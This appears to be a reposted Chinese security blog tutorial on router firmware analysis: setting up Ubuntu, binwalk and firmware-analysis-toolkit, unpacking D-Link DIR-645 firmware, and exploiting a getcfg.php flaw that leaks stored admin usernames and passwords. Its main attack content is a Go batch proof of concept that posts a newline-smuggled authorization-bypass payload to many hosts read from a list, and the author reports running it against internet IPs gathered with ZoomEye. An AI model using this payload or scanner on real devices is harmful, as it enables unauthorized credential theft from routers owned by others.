路由器固件下的小试牛刀,与漏洞相关的经验分享
本篇文章以路由器固件相關(guān)漏洞來(lái)演示,從0到1分享經(jīng)驗(yàn)。
本地虛擬機(jī)搭建ubuntu 16.04
ubuntu iso下載地址:http://mirrors.aliyun.com/ubuntu-releases/
安裝完,給root用戶新增個(gè)密碼
sudo passwd root
切換到root用戶
su root
修改阿里云鏡像:
vi /etc/apt/sources.list
打開(kāi)文件不要做任何操作,直接輸入 ggdG 清空當(dāng)前文件內(nèi)容,注意 G 是大寫(xiě)
ggdG
然后粘貼以下內(nèi)容
#deb cdrom:[Ubuntu 16.04 LTS Xenial Xerus - Release amd64 (20160420.1)]/ xenial main restricted deb-src
http://archive.ubuntu.com/ubuntu xenial main restricted #Added by
software-properties deb http://mirrors.aliyun.com/ubuntu/ xenial main
restricted deb-src http://mirrors.aliyun.com/ubuntu/ xenial main
restricted multiverse universe #Added by software-properties deb
http://mirrors.aliyun.com/ubuntu/ xenial-updates main restricted
deb-src http://mirrors.aliyun.com/ubuntu/ xenial-updates main
restricted multiverse universe #Added by software-properties deb
http://mirrors.aliyun.com/ubuntu/ xenial universe deb
http://mirrors.aliyun.com/ubuntu/ xenial-updates universe deb
http://mirrors.aliyun.com/ubuntu/ xenial multiverse deb
http://mirrors.aliyun.com/ubuntu/ xenial-updates multiverse deb
http://mirrors.aliyun.com/ubuntu/ xenial-backports main restricted
universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/
xenial-backports main restricted universe multiverse #Added by
software-properties deb http://archive.canonical.com/ubuntu xenial
partner deb-src http://archive.canonical.com/ubuntu xenial partner deb
http://mirrors.aliyun.com/ubuntu/ xenial-security main restricted
deb-src http://mirrors.aliyun.com/ubuntu/ xenial-security main
restricted multiverse universe #Added by software-properties deb
http://mirrors.aliyun.com/ubuntu/ xenial-security universe deb
http://mirrors.aliyun.com/ubuntu/ xenial-security multiverse
更新鏡像源(注意不同版本的鏡像源是不一樣的)
sudo apt-get update
安裝python3.7
因?yàn)閡buntu 16.04帶的python是3.5的,而 Binwalk 要求3.6以上。
sudo add-apt-repository ppa:deadsnakes/ppa sudo apt-get update sudo
apt-get install python3.7
修改apt指定的python3
sudo update-alternatives --install /usr/bin/python3 python3
/usr/bin/python3.5 1 sudo update-alternatives --install
/usr/bin/python3 python3 /usr/bin/python3.7 2
update-alternatives命令可以修改系統(tǒng)默認(rèn)命令的軟鏈指向,通過(guò)以下命令,可以切換Python3的指向
sudo update-alternatives --config python3
查看一下是否安裝成功:
檢測(cè)版本:
python3 -V
安裝binwalk(也可翻到后文直接使用自動(dòng)化工具《自動(dòng)安裝binwalk》)
git clone https://github.com/ReFirmLabs/binwalk.git cd binwalk sudo
./deps.sh sudo python3 setup.py install
安裝unzip
apt install unzip
解壓縮固件
unzip DLink_DIR645_A1_FW102B08.zip
如上圖,可以看到成功解包
DIR-645信息泄露
比如,這里是DIR645的固件包,我們直接去看web目錄下的 getcfg.php文件
HTTP/1.1 200 OK Content-Type: text/xml<?echo "<?";?>xml version="1.0" encoding="utf-8"<?echo "?>";?> <postxml> <? include "/htdocs/phplib/trace.php";if ($_POST["CACHE"] == "true") {echo dump(1, "/runtime/session/".$SESSION_UID."/postxml"); } else {/* cut_count() will return 0 when no or only one token. */$SERVICE_COUNT = cut_count($_POST["SERVICES"], ",");TRACE_debug("GETCFG: got ".$SERVICE_COUNT." service(s): ".$_POST["SERVICES"]);$SERVICE_INDEX = 0;while ($SERVICE_INDEX < $SERVICE_COUNT){$GETCFG_SVC = cut($_POST["SERVICES"], $SERVICE_INDEX, ",");TRACE_debug("GETCFG: serivce[".$SERVICE_INDEX."] = ".$GETCFG_SVC);if ($GETCFG_SVC!=""){$file = "/htdocs/webinc/getcfg/".$GETCFG_SVC.".xml.php";/* GETCFG_SVC will be passed to the child process. */if (isfile($file)=="1") dophp("load", $file);}$SERVICE_INDEX++;} } ?></postxml>查看源碼我們能看到/htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml.php存在用戶名及密碼的泄漏
批量檢測(cè)腳本
直接擼一個(gè)poc
package mainimport ("bufio""crypto/tls""flag""fmt""github.com/fatih/color""io""io/ioutil""net/http""os""strings""sync" )func exec(targetURL string, isbatch bool) {PostData := `SERVICES=DEVICE.ACCOUNT&attack=true%0aAUTHORIZED_GROUP=1`/*構(gòu)造payload*/cli := &http.Client{Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}}if !strings.Contains(targetURL, "http") {targetURL = "http://" + targetURL}request, err := http.NewRequest(http.MethodPost, targetURL+"/getcfg.php", strings.NewReader(PostData))if err != nil {fmt.Println(err)}request.Header.Add("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0")request.Header.Add("Connection", "close")request.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")request.Header.Add("Accept-Encoding", "gzip, deflate")request.Header.Add("Upgrade-Insecure-Requests", "1")request.Header.Add("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2")/*http請(qǐng)求體構(gòu)建并忽略tls證書(shū)校驗(yàn)*/do, err := cli.Do(request)if err != nil {return} /*發(fā)送數(shù)據(jù)包*/defer func() {_ = do.Body.Close()}()if do.StatusCode == 404 {return} else if do.StatusCode == 200 {all, _ := ioutil.ReadAll(do.Body)if isbatch {if strings.Contains(string(all), "DEVICE.ACCOUNT") {color.Blue(fmt.Sprintf("%s 存在漏洞\n", targetURL))}}}color.Red(fmt.Sprintf("%s 不存在漏洞\n", targetURL))return }func main() {var wg sync.WaitGroupvar targetURL, filepath stringflag.StringVar(&targetURL, "u", "", "")flag.StringVar(&filepath, "l", "", "")flag.CommandLine.Usage = func() { fmt.Println("使用說(shuō)明:\n執(zhí)行命令:./main -u http://127.0.0.1:8080 \n批量檢測(cè):./main -l url.txt ") }flag.Parse()if len(targetURL) == 0 {file, err := os.OpenFile(filepath, os.O_RDWR, 0666)if err != nil {fmt.Println("Open file error!", err)return}defer file.Close()buf := bufio.NewReader(file)for {wg.Add(1)line, err := buf.ReadString('\n')line = strings.TrimSpace(line)a := linego func() {exec(a, true)wg.Done()}()if err != nil {if err == io.EOF {break} else {fmt.Println("Read file error!", err)return}}}} else {exec(targetURL, false)}wg.Wait() }使用zoomeye在互聯(lián)網(wǎng)爬的IP,一個(gè)漏洞都沒(méi)有,哈哈哈 尷尬。
安裝自動(dòng)化分析固件firmware-analysis-toolkit
如果qemu或者binwalk出錯(cuò),可以嘗試按照之前說(shuō)的操作來(lái)手動(dòng)安裝。
git clone https://github.com/attify/firmware-analysis-toolkit cd firmware-analysis-toolkit ./setup.sh修改配置文件fat.config
fat.py 運(yùn)行的時(shí)候需要獲取sudo 密碼,和firmadyne的路徑
把地址替換成自己的,如下
[DEFAULT] sudo_password=root firmadyne_path=/home/txf/Desktop/firmware-analysis-toolkit/firmadyne ./fat.py xxx.bin運(yùn)氣好就會(huì)出現(xiàn)下面啟動(dòng)成功的提示
運(yùn)氣不好就是起不來(lái)。
當(dāng)然,畢竟是虛擬環(huán)境,很多情況下會(huì)遇到各種各樣的問(wèn)題,所以有條件的還是買真機(jī)來(lái)調(diào)試吧【想領(lǐng)取網(wǎng)絡(luò)安全資料的朋友才能點(diǎn)】
總結(jié)
以上是生活随笔為你收集整理的路由器固件下的小试牛刀,与漏洞相关的经验分享的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 当我给小姐姐讲述为何黑客要挟制路由器DN
- 下一篇: php内核分析-fpm和df的问题思考